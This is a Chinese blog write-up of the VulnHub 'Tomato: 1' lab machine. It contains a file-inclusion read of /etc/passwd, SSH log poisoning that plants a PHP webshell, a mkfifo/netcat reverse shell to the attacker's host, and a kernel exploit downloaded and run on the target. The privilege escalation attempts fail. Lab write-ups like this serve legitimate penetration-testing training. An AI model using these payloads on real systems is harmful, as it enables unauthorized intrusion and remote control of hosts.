VulnHub-Tomato: 1

靶机地址:https://www.vulnhub.com/entry/tomato-1,557/

目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

一、信息收集

用 arp-scan 探测网段内目标靶机的 IP,得到目标靶机的IP为 192.168.11.137

arp-scan -l

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.131
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1   00:50:56:f3:b5:59       VMware, Inc.
192.168.11.137 00:0c:29:29:d9:2e       VMware, Inc.
192.168.11.254 00:50:56:e2:c4:a9       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 3 responded

使用masscan扫描开放的端口,发现开放 8888、80、2211、21 四个端口

masscan -p0-65535 192.168.11.137

┌──(root㉿kali)-[~]
└─# masscan -p0-65535 192.168.11.137
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-04-17 12:22:07 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 8888/tcp on 192.168.11.137                                
Discovered open port 80/tcp on 192.168.11.137                                  
Discovered open port 2211/tcp on 192.168.11.137                                
Discovered open port 21/tcp on 192.168.11.137

使用 nmap 扫描开放端口的服务

nmap -sV -p8888,80,2211,21 192.168.11.137

┌──(root㉿kali)-[~]
└─# nmap -sV -p8888,80,2211,21 192.168.11.137
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 14:43 CST
Nmap scan report for 192.168.11.137
Host is up (0.00043s latency).

PORT     STATE SERVICE VERSION
21/tcp   open ftp     vsftpd 3.0.3
80/tcp   open http   Apache httpd 2.4.18 ((Ubuntu))
2211/tcp open ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
8888/tcp open http   nginx 1.10.3 (Ubuntu)
MAC Address: 00:0C:29:29:D9:2E (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.49 seconds

使用 dirb 扫描一下开放的 80 端口

dirb http://192.168.11.137/

┌──(root㉿kali)-[~]
└─# dirb http://192.168.11.137/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Apr 18 14:30:12 2023
URL_BASE: http://192.168.11.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.11.137/ ----
==> DIRECTORY: http://192.168.11.137/antibot_image/
+ http://192.168.11.137/index.html (CODE:200|SIZE:652)
+ http://192.168.11.137/server-status (CODE:403|SIZE:279)

---- Entering directory: http://192.168.11.137/antibot_image/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
  (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Apr 18 14:30:14 2023
DOWNLOADED: 4612 - FOUND: 2

二、漏洞挖掘

访问http://192.168.11.137/antibot_image/发现存在目录 antibots

访问 antibots 目录后发现存在很多文件

访问http://192.168.11.137/antibot_image/antibots/info.php后F12查看源码发现存在文件包含漏洞

http://192.168.11.137/antibot_image/antibots/info.php?image=/etc/passwd

三、GetShell

信息搜集时发现 2211 端口服务为 ssh,尝试对日志文件写入 shell,然后包含日志文件。

查看日志文件是否在默认路径

http://192.168.11.137/antibot_image/antibots/info.php?image=/var/log/auth.log

利用 ssh 连接,写入一句话木马

ssh '<?php system($_GET['cmd']);?>'@192.168.11.137 -p 2211

┌──(root㉿kali)-[~]
└─# ssh '<?php system($_GET['cmd']);?>'@192.168.11.137 -p 2211
The authenticity of host '[192.168.11.137]:2211 ([192.168.11.137]:2211)' can't be established.
ED25519 key fingerprint is SHA256:99Mk+oWitdg2e434cvlhvYgeQaMwRs76tgSLrezh9/I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.11.137]:2211' (ED25519) to the list of known hosts.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
Permission denied, please try again.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
Permission denied, please try again.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
<?php system($_GET[cmd]);?>@192.168.11.137: Permission denied (publickey,password).

Kali端监听

nc -lvnp 5868

┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...

使用Burp Suite反弹SHELL(快捷键Ctrl+U编码)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.131 5868 >/tmp/f

升级Full TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo

fg

ls

export SHELL=/bin/bash

export TERM=screen

stty rows 33 columns 145

reset

┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.137] 39958
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/antibot_image/antibots$ ^Z
[1]+ 已停止               nc -lvnp 5868

┌──(root㉿kali)-[~]
└─# stty raw -echo

┌──(root㉿kali)-[~]
└─#
nc -lvnp 5868
            ls
antibot.php functions language     screenshot-1.jpg settings
assets       guide     license.txt screenshot-2.jpg table
dashboard   info.php   readme.txt   screenshot-3.jpg uninstall.php
www-data@ubuntu:/var/www/html/antibot_image/antibots$ export SHELL=/bin/bash
www-data@ubuntu:/var/www/html/antibot_image/antibots$ export TERM=screen
www-data@ubuntu:/var/www/html/antibot_image/antibots$ stty rows 33 columns 145
www-data@ubuntu:/var/www/html/antibot_image/antibots$ reset

四、提权---失败

查看 linux 内核版本

uname -a

www-data@ubuntu:/var/www/html/antibot_image/antibots$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

1、虚假的提权

寻找可利用的 EXP

searchsploit 4.4.0-21

利用 44300.c 提权

┌──(root㉿kali)-[~]
└─# locate linux_x86-64/local/44300.c
/usr/share/exploitdb/exploits/linux_x86-64/local/44300.c

┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux_x86-64/local/44300.c tomato

┌──(root㉿kali)-[~]
└─# ls -al tomato |grep 44300.c
-rw-r--r--   1 root root 5959 4月18日 15:29 44300.c

查看POC

cat 44300.c

┌──(root㉿kali)-[~/tomato]
└─# cat 44300.c
/**
EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
Video ~ https://www.youtube.com/watch?v=qchiJn94kTo
**/

/** decr.c **/
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/

Kali下载编译EXP

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip

unzip 44300.zip

gcc decr.c -m32 -O2 -o decr

gcc pwn.c -O2 -o pwn

┌──(root㉿kali)-[~/tomato]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
--2023-04-18 15:45:10-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2575 (2.5K) [application/octet-stream]
正在保存至: “44300.zip”

44300.zip                           100%[===================================================================>]   2.51K --.-KB/s 用时 0.01s  

2023-04-18 15:45:13 (255 KB/s) - 已保存 “44300.zip” [2575/2575])


┌──(root㉿kali)-[~/tomato]
└─# unzip 44300.zip
Archive: 44300.zip
inflating: pwn.c                  
inflating: decr.c                  

┌──(root㉿kali)-[~/tomato]
└─# gcc decr.c -m32 -O2 -o decr

┌──(root㉿kali)-[~/tomato]
└─# gcc pwn.c -O2 -o pwn

┌──(root㉿kali)-[~/tomato]
└─# ls -al
总计 68
drwxr-xr-x 2 root root 4096 4月18日 15:51 .
drwx------ 33 root root 4096 4月18日 15:38 ..
-rw-r--r-- 1 root root 5959 4月18日 15:29 44300.c
-rw-r--r-- 1 root root 2575 4月18日 15:45 44300.zip
-rwxr-xr-x 1 root root 15572 4月18日 15:50 decr
-rw-r--r-- 1 root root 4565 2016年 4月23日 decr.c
-rwxr-xr-x 1 root root 16440 4月18日 15:51 pwn
-rw-rw-r-- 1 root root 1163 2016年 4月23日 pwn.c

Kali 端启开启 http 服务

python3 -m http.server 8000

┌──(root㉿kali)-[~/tomato]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

靶机下载EXP并赋权

wget http://192.168.11.131:8000/decr

wget http://192.168.11.131:8000/pwn

chmod 777 decr pwn

www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/decr   
--2023-04-18 00:53:59-- http://192.168.11.131:8000/decr
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15572 (15K) [application/octet-stream]
Saving to: 'decr'

decr                                 100%[===================================================================>] 15.21K --.-KB/s   in 0s      

2023-04-18 00:53:59 (586 MB/s) - 'decr' saved [15572/15572]

www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/pwn
--2023-04-18 00:54:09-- http://192.168.11.131:8000/pwn
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16440 (16K) [application/octet-stream]
Saving to: 'pwn'

pwn                                 100%[===================================================================>] 16.05K --.-KB/s   in 0.001s  

2023-04-18 00:54:09 (12.9 MB/s) - 'pwn' saved [16440/16440]

www-data@ubuntu:/tmp$ ls -al |grep www-data
-rw-r--r-- 1 www-data www-data 15572 Apr 18 00:50 decr
prw-r--r-- 1 www-data www-data     0 Apr 18 00:54 f
-rw-r--r-- 1 www-data www-data 16440 Apr 18 00:51 pwn
www-data@ubuntu:/tmp$ chmod 777 decr pwn
www-data@ubuntu:/tmp$ ls -al |grep www-data
-rwxrwxrwx 1 www-data www-data 15572 Apr 18 00:50 decr
prw-r--r-- 1 www-data www-data     0 Apr 18 00:54 f
-rwxrwxrwx 1 www-data www-data 16440 Apr 18 00:51 pwn
www-data@ubuntu:/tmp$

执行EXP提权,提权失败

./decr

./pwn

www-data@ubuntu:/tmp$ ./decr
bash: ./decr: No such file or directory

注:网传将exp编译为64位版本即可提权

gcc decr.c -m64 -O2 -o decr

gcc pwn.c -m64 -O2 -o pwn

2、网传真实的提权(虚假)

GitHub查询到CVE-2017-6074版本的EXP可利用

https://github.com/kkamagui/linux-kernel-exploits

Kali下载EXP并编译

git clone https://github.com/kkamagui/linux-kernel-exploits.git

cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/

┌──(root㉿kali)-[~/tomato]
└─# git clone https://github.com/kkamagui/linux-kernel-exploits.git
正克隆到 'linux-kernel-exploits'...
remote: Enumerating objects: 39, done.
remote: Total 39 (delta 0), reused 0 (delta 0), pack-reused 39
接收对象中: 100% (39/39), 37.83 KiB | 27.00 KiB/s, 完成.
处理 delta 中: 100% (3/3), 完成.

┌──(root㉿kali)-[~/tomato]
└─# cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ls -al
总计 32
drwxr-xr-x 2 root root 4096 4月18日 16:39 .
drwxr-xr-x 6 root root 4096 4月18日 16:08 ..
-rwxr-xr-x 1 root root   37 4月18日 16:08 compile.sh
-rw-r--r-- 1 root root 16554 4月18日 16:08 CVE-2017-6074.c

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ./compile.sh

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ls -al
总计 56
drwxr-xr-x 2 root root 4096 4月18日 16:39 .
drwxr-xr-x 6 root root 4096 4月18日 16:08 ..
-rwxr-xr-x 1 root root   37 4月18日 16:08 compile.sh
-rwxr-xr-x 1 root root 23096 4月18日 16:39 CVE-2017-6074
-rw-r--r-- 1 root root 16554 4月18日 16:08 CVE-2017-6074.c

开启 http 服务

python3 -m http.server 8000

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# pwd
/root/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074

┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

靶机接收EXP并赋权

wget http://192.168.11.131:8000/CVE-2017-6074

chmod 777 CVE-2017-6074

www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/CVE-2017-6074
--2023-04-18 01:42:07-- http://192.168.11.131:8000/CVE-2017-6074
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23096 (23K) [application/octet-stream]
Saving to: 'CVE-2017-6074'

CVE-2017-6074                       100%[===================================================================>] 22.55K --.-KB/s   in 0s      

2023-04-18 01:42:07 (877 MB/s) - 'CVE-2017-6074' saved [23096/23096]

www-data@ubuntu:/tmp$ ls -al |grep CVE-2017-6074
-rw-r--r-- 1 www-data www-data 23096 Apr 18 01:39 CVE-2017-6074
www-data@ubuntu:/tmp$ chmod 777 CVE-2017-6074

执行EXP提权

./CVE-2017-6074

www-data@ubuntu:/tmp$ ./CVE-2017-6074
./CVE-2017-6074: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./CVE-2017-6074)

3、GLIBC版本解决

  1. 查看靶场GLIBC版本

    ldd --version

  2. 配置all in one环境

  3. 安装配置patchelf

    git clone https://github.com/NixOS/patchelf.git

    cd patchelf

    ./bootstrap.sh

    ./configure

    make

    make check

    make install

  4. 下载配置特定版本glibc

    • 查看可用版本

      cat old_list # 注意文件版本(cat list)

    • 下载64位2.34版本GLIBC

      ./download_old 2.34-0ubuntu3_amd64 # 注意下载脚本是否为old版(./download)

  5. 编译(核心精华),以下两种方式均可

    注:

    1. GLIBC地址需要绝对路径

    2. -Wl,--rpath指定ld-linux-x86-64.so.2文件所在目录

    3. -Wl,--dynamic-linker指定ld-linux-x86-64.so.2文件

    • gcc -Wl,--rpath=/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ -Wl,--dynamic-linker=/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ld-linux-x86-64.so.2 -s CVE-2017-6074.c -o exp

    • gcc -Wl,-rpath='/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/',-dynamic-linker='/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ld-linux-x86-64.so' -s CVE-2017-6074.c -o exp

    -Wl,--rpath=[GLIBC版本对应的ld-linux-x86-64.so.2所在目录] # 绝对路径

    -Wl,--dynamic-linker=[GLIBC版本对应的ld-linux-x86-64.so.2文件] # 绝对路径

    -s:指定要编译的文件,选项可省略

    -o:指定编译后文件名,选项及参数均可省略

提权一直失败,就很神奇

放弃吧~~~

posted @ 2023-04-21 13:49  HKalpa  阅读(282)  评论(1编辑  收藏  举报